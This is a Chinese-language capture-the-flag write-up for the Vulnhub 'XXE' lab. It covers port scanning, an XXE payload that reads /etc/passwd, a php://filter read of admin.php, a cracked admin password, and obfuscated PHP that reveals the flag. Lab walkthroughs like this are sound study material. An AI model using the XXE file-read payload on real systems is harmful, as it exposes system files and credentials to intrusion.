SfTian Vulnhub-XXE # XXE ## 收集资产 ```shell netdiscover -r 192.168.0.0/24 nmap -p- 192.168.0.139 #masscan -p 0-65535 192.168.0.139 nmap -sV -sC -p- -A 192.168.0.139 ``` | 端口 | 服务 | | -------- | ----- | | 80/TCP | http | | 5355/TCP | LLMNR | ## Web 在`robots.txt`中发现不允许爬虫访问/xxe/*和/admin.php,那么就从这两个地方入手 访问后发现admin.php在/xxe目录下,xxe是一个登录页面,用burp抓包发现发送的数据为XML格式,那么就可以尝试使用XXE DTD来getshell ```XML <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY sp SYSTEM "file:///etc/passwd"> ]> <root><name>&sp;</name><password>ad</password></root> #php://filter/read=convert.base64-encode/resource=admin.php ``` 然后用php读取文件admin.php可以看到username和password在文件中写有逻辑判断,那么就可以通过解密md5获取admin的账号密码`administhebest/e6e061838856bf47e1de730719fb2609` -> `administhebest/admin@123`登录之后可以访问`http://192.168.0.139/xxe/flagmeout.php`  ``` JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5 -> /etc/.flag.php ```  拿到 ``` $_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_); ``` 将其使用base64加密然后保存到php中运行可以拿到flag  ``` SAFCSP{xxe_is_so_easy} ``` 取消回复 发表新评论 提交评论
